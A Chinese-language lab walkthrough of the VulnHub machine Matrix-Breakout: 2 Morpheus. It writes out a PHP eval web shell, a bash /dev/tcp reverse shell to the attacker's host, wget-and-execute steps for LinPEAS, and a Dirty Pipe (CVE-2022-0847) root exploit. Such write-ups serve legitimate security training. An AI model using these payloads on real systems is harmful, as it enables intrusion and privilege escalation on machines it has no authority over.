准备环境
1.靶机:Matrix-Breakout: 2 Morpheus
下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
2.用到的知识点
文件上传upload-lab、
php伪协议、
反弹shell、
漏洞收集脚本LINpeas的使用
CVE-2022-0847提权
一:信息收集
1.nmap 网段扫描存活主机:
nmap -sS -T4 192.168.253.0/24
http://192.168.253.131/
2.端口扫描:
nmap -A -p- 192.168.253.131
开放的端口有22、80、81,有http和ssh服务
3.目录扫描:
dirb http://192.168.253.131 没有扫描出来
安装gobuster
①更新下载源
apt-get update
②下载
apt-get install gobuster
③查看字典
cd /usr/share/wordlists/dirbuster
④gobuster目录扫描
gobuster dir -u http://192.168.253.131 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/fasttrack.txt
获取shell
1.登录网页
192.168.253.131/graffiti.php
2.burpsuite抓包
1).上传一句木马:
<?php @eval($_POST['a']);?>
因为post上传的是txt文件,需要抓包修改一下 改成PHP格式,然后放包
2).蚁剑连接
连接成功过但没有回显
反弹shell
1.可以像上面一样写入反弹shell 脚本
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.253.128/8888 0>&1'");?>
同样将.txt格式改成.php ,名字随意改,这里我改成了2.php ,一会访问这个2.php
2.攻击机开启监听端口8888
nc -lvvp 8888
然后访问这个2.php反弹shell,反弹成功
提权
1.试着SUID提权
find / -perm -u=s -type f 2>/dev/null
没发现可以利用的文件
2.linpeas
LinPEAS 是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。
该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置
1)下载地址:
https://github.com/carlospolop/PEASS-ng/releases
下载linpeas.sh
2)kali中直接安装linpeas
也可以在kali中直接下载linpeas这个脚本(这个更方便),安装后查看一下里面的文件
将这个脚本上传到靶机,上传后给脚本赋权 ,然后执行
先起http:
python3 -m http.server 80
下载到靶机上:
wget http://192.168.253.128:80/linpeas_fat.sh
赋权:
chmod +x linpeas_fat.sh
执行:
./linpeas_fat.sh
检测出来的漏洞,CVE-2022-0847
在kali上下载这个漏洞,在github上下载
git clone https://github.com/imfiver/CVE-2022-0847.git
开启http服务,
python3 -m http.server 80
靶机下载,
wget http://192.168.253.128:80/CVE-2022-0847/Dirty-Pipe.sh
赋权、执行
chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
cd /
ls
cat FLAG.txt